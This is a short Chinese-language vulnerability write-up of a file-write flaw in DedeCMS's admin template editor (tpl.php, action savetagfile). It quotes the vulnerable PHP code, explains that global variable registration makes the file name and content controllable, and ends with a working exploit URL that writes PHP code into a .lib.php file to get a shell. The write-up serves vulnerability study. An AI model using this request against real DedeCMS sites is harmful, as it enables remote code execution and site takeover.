csrf_check();

if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))

{

    ShowMsg('文件名不合法，不允許進(jìn)行操作！', '-1');

    exit();

}

require_once(DEDEINC.'/oxwindow.class.php');

$tagname = preg_replace("#\.lib\.php$#i", "", $filename);

$content = stripslashes($content);

$truefile = DEDEINC.'/taglib/'.$filename;

$fp = fopen($truefile, 'w');

fwrite($fp, $content);

fclose($fp);

1.由于dedecms全局變量注冊(cè)的特性，所以這里的content變量和filename變量可控。

2.可以看到將content直接寫(xiě)入到文件中導(dǎo)致可以getshell。但是這里的文件名經(jīng)過(guò)正則表達(dá)式，所以必須要.lib.php結(jié)尾。

域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值